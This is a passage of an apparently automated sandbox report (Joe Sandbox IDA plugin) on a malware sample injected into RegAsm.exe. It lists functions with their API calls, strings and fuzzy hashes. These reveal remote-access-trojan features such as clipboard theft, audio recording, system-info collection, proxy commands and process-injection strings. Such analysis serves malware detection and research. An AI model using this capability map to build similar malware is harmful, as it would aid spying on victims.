                                                                                  • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                                                  • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                  • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                  • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040A859
                                                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                • String ID: 8SG$8SG$P>4$p54
                                                                                • API String ID: 3795512280-3795555813
                                                                                • Opcode ID: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                                                                                • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                                                                • Opcode Fuzzy Hash: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                                                                                • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E
                                                                                Function 00414BEB Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 65535$udp
                                                                                • API String ID: 0-1267037602
                                                                                • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                                • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                                                                • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                                • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                                                                Function 0043A8BA Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                                                                • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                                                                • __dosmaperr.LIBCMT ref: 0043A926
                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                                                                • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                                                                • __dosmaperr.LIBCMT ref: 0043A963
                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                                                                • __dosmaperr.LIBCMT ref: 0043A9B7
                                                                                • _free.LIBCMT ref: 0043A9C3
                                                                                • _free.LIBCMT ref: 0043A9CA
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                • String ID:
                                                                                • API String ID: 2441525078-0
                                                                                • Opcode ID: 289d0842b92f941f4feb2be478b72c6b1387c4c53bdf58ebb9c1b022d59fa5b6
                                                                                • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                                                                • Opcode Fuzzy Hash: 289d0842b92f941f4feb2be478b72c6b1387c4c53bdf58ebb9c1b022d59fa5b6
                                                                                • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                                                                Function 0041A045 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 176sleeptimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 0041A04A
                                                                                • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                                                • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                                                • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                                                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                • String ID: p54$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                • API String ID: 489098229-470385806
                                                                                • Opcode ID: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                                                                                • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                                                                • Opcode Fuzzy Hash: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                                                                                • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                                                                Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                                                • GetMessageA.USER32 ref: 0040556F
                                                                                • TranslateMessage.USER32(?), ref: 0040557E
                                                                                • DispatchMessageA.USER32 ref: 00405589
                                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                                                • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                • API String ID: 2956720200-749203953
                                                                                • Opcode ID: c1c3b9fa3f2ec3db4d6b6b73e886c266241c202666a46fd1ccd2ca1fadaa2b5d
                                                                                • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                                                                • Opcode Fuzzy Hash: c1c3b9fa3f2ec3db4d6b6b73e886c266241c202666a46fd1ccd2ca1fadaa2b5d
                                                                                • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                                                                                Function 00417D1A Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                                                                • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                                                                • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                • String ID: 0VG$0VG$<$@$Temp
                                                                                • API String ID: 1704390241-2575729100
                                                                                • Opcode ID: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                                                                                • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                                                                • Opcode Fuzzy Hash: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                                                                                • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                                                                Function 0041697B Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenClipboard.USER32 ref: 0041697C
                                                                                • EmptyClipboard.USER32 ref: 0041698A
                                                                                • CloseClipboard.USER32 ref: 00416990
                                                                                • OpenClipboard.USER32 ref: 00416997
                                                                                • GetClipboardData.USER32 ref: 004169A7
                                                                                • GlobalLock.KERNEL32 ref: 004169B0
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                • CloseClipboard.USER32 ref: 004169BF
                                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                • String ID: !D@
                                                                                • API String ID: 2172192267-604454484
                                                                                • Opcode ID: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                                                                                • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                                                                • Opcode Fuzzy Hash: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                                                                                • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                                                                Function 0041AB9E Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                • String ID:
                                                                                • API String ID: 221034970-0
                                                                                • Opcode ID: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                                • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                                                                • Opcode Fuzzy Hash: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                                • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                                                                Function 004481A1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _free.LIBCMT ref: 004481B5
                                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                • _free.LIBCMT ref: 004481C1
                                                                                • _free.LIBCMT ref: 004481CC
                                                                                • _free.LIBCMT ref: 004481D7
                                                                                • _free.LIBCMT ref: 004481E2
                                                                                • _free.LIBCMT ref: 004481ED
                                                                                • _free.LIBCMT ref: 004481F8
                                                                                • _free.LIBCMT ref: 00448203
                                                                                • _free.LIBCMT ref: 0044820E
                                                                                • _free.LIBCMT ref: 0044821C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                                                                • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                                                                Function 100059D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _free.LIBCMT ref: 100059EA
                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                • _free.LIBCMT ref: 100059F6
                                                                                • _free.LIBCMT ref: 10005A01
                                                                                • _free.LIBCMT ref: 10005A0C
                                                                                • _free.LIBCMT ref: 10005A17
                                                                                • _free.LIBCMT ref: 10005A22
                                                                                • _free.LIBCMT ref: 10005A2D
                                                                                • _free.LIBCMT ref: 10005A38
                                                                                • _free.LIBCMT ref: 10005A43
                                                                                • _free.LIBCMT ref: 10005A51
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                                • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                                Function 00411530 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Eventinet_ntoa
                                                                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                                                • API String ID: 3578746661-3604713145
                                                                                • Opcode ID: d16bb5f8acb4f4edd706dea9c6aa242324435850ff4d97f1b554300b27c411f7
                                                                                • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                                                                • Opcode Fuzzy Hash: d16bb5f8acb4f4edd706dea9c6aa242324435850ff4d97f1b554300b27c411f7
                                                                                • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                                                                                Function 00455F84 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DecodePointer
                                                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                • API String ID: 3527080286-3064271455
                                                                                • Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                                                • Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
                                                                                • Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                                                • Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E
                                                                                Function 004174D0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                • Sleep.KERNEL32(00000064), ref: 0041755C
                                                                                • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CreateDeleteExecuteShellSleep
                                                                                • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                • API String ID: 1462127192-2001430897
                                                                                • Opcode ID: f12e1a09c6e255144d90da2c79bf1f1cd4418c09111891b4f18985c985915801
                                                                                • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                                                                                • Opcode Fuzzy Hash: f12e1a09c6e255144d90da2c79bf1f1cd4418c09111891b4f18985c985915801
                                                                                • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                                                                                Function 004073E7 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00472B14,00000000,?,00003000,00000004,00000000,00000001), ref: 00407418
                                                                                • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004074D9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CurrentProcess
                                                                                • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                                • API String ID: 2050909247-4242073005
                                                                                • Opcode ID: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                                                                • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                                                                                • Opcode Fuzzy Hash: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                                                                • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                                                                                Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _strftime.LIBCMT ref: 00401D50
                                                                                  • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
                                                                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                                                • API String ID: 3809562944-243156785
                                                                                • Opcode ID: c516264c44cb761782eec52892d0a1fed95260c95ae9b4565e1287bee73375bc
                                                                                • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                                                                                • Opcode Fuzzy Hash: c516264c44cb761782eec52892d0a1fed95260c95ae9b4565e1287bee73375bc
                                                                                • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                                                                                Function 00410E9C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                                                • int.LIBCPMT ref: 00410EBC
                                                                                  • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                  • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                                                • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                • String ID: ,kG$0kG
                                                                                • API String ID: 3815856325-2015055088
                                                                                • Opcode ID: 520139271163b524b0f3c27c15f9cb8b3411f5b4579fbd911df66d6a7deba011
                                                                                • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                                                                • Opcode Fuzzy Hash: 520139271163b524b0f3c27c15f9cb8b3411f5b4579fbd911df66d6a7deba011
